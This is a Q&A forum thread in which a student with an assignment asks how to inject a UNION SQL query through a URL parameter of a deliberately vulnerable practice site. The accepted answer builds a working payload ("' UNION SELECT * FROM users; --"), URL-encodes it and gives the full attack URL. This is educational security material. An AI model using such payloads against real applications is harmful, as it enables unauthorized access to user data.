# Inject SQL query into http URL

Tags: sql, sqlite, http, url, sql-injection

I got an assignment to make SQL injection to a fake website that was built for that purpose.
I wanted to know how to inject SQL query into an URL.
for example,

```
http://localhost:<>/vulnerabilities/webapi/users/<my suffix>/nickname?username=my_id
```

I have this URL, and I want to inject UNION query to it, how do I do that?
Thanks.

Comment: The value of the username parameter will participate in the query formatting, so, you need to give a special value in the username parameter. The value will not be sanitized, so, you can include sql expressions. Have a look here: https://owasp.org/www-community/attacks/Blind_SQL_Injection

Answer (score 1, accepted):

Let's assume that your web query will be translated to

```
SELECT * FROM users WHERE username = 'my_id';
```

Now, the trick is to replace `'my_id'` by the malicious code. I assume that the purpose of the UNION query is to return all the users instead of just one. The result should be:

```
SELECT * FROM users WHERE username = 'my_id' UNION SELECT * FROM users; -- ';
```

Maybe the original query has a field list instead of `*`. Then you will have to duplicate this list in the second query.

Now instead of `my_id`, you must enter

```
my_id' UNION SELECT * FROM users; --
```

Note that we terminate our entry with a `--` introducing a comment. The query mechanism will terminate the query by appending a final single quote (and maybe a semicolon). Now they will be turned into a comment.

The next question is, how do we escape this correctly for the URL. Using the online tool [Code Beautify, HTML Escape/Unescape](https://codebeautify.org/html-escape-unescape), we get:

```
my_id%27%20UNION%20SELECT%20*%20FROM%20users%3B%20--
```

This gives the full URL:

```
http://localhost:<>/vulnerabilities/webapi/users//nickname?username=my_id%27%20UNION%20SELECT%20*%20FROM%20users%3B%20--
```